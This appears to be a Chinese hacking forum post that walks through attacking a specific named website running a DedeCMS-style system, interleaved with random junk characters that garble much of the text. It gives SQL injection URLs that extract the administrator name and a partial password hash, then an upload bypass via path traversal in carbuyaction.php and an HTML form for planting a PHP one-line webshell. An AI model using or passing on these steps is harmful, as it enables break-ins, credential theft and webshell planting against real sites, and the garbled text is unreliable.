①注入漏洞。+ N: K6 ? k. C
这站 http://www.political-security.com/; V O! m" U4 e8 r' A. M8 k6 m' ]
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
. Q+ E0 f) f" Xwww.political-security.com/data/mysql_error_trace.inc 爆后台
' t8 j6 d2 T) [然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
) ~' u5 _) z* z* Y0 b+ q* n然后写上语句 & Y, C& Y. [& }( t) a9 R
查看管理员帐号+ N/ |& t* s+ k7 E# u
http://www.political-security.co ... &membergroup=@`% p/ D8 `- L$ Y0 O/ M
: e+ K3 y2 E H' ~9 Z' _4 i
admin
& ^, n W/ h! _; c9 P) `& N% d7 q* C
查看管理员密码
: G- u/ g, A3 d/ O1 w. e http://www.political-security.co ... &membergroup=@`
9 h, u- Z3 [; e( e: j; t
7 e) Q' Q9 C# f6 B- f8d29b1ef9f8c5a5af429, q( F7 ^/ G# v: l+ p3 ?( T* v
( o' T }8 E6 f5 ?* }" r
查看管理员密码
\1 V% i: N2 s+ h# g; y7 ?# D. T9 o% l U" p2 ]4 f1 Y4 `& T
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
2 k8 C9 v$ ^8 ^2 @2 I1 C, k
- t. s( h7 H, Y' h8d2
+ |% i* M6 Z$ b9 {: j2 b F- e% g9b1ef9f8c5a5af42" l5 i) X# w: p$ u3 O
9
- o, V v4 [; `' U- f6 f: F Q
8 q: k* C; l5 ]* l* M( Ucmd5没解出来 只好测试第二个方法
0 `! Y" L1 i! d. X0 M# A7 m4 D4 V/ L* P6 u
% ~6 ^- L1 H' G( T9 h②上传漏洞:. a O3 H5 f3 m1 o0 ^. F
* @2 B, P* P- q; t7 v( p' O只要登陆会员中心,然后访问页面链接. v3 n- L2 p' F( u
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
/ {2 O* Y% w r0 r1 O
: g9 ? l- c, ~* W( g如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”* w! e7 ~" e. B
( r9 J% o: L% Y, n; u* k& _
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
$ H2 s: q' g5 ]" T; e, D( [1 S6 ?: h# X m1 a7 {" k; y
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
; F: O6 k/ ^4 Y% I9 s4 y) o& K或者: `" ] g( r$ u& q
即可上传成功 |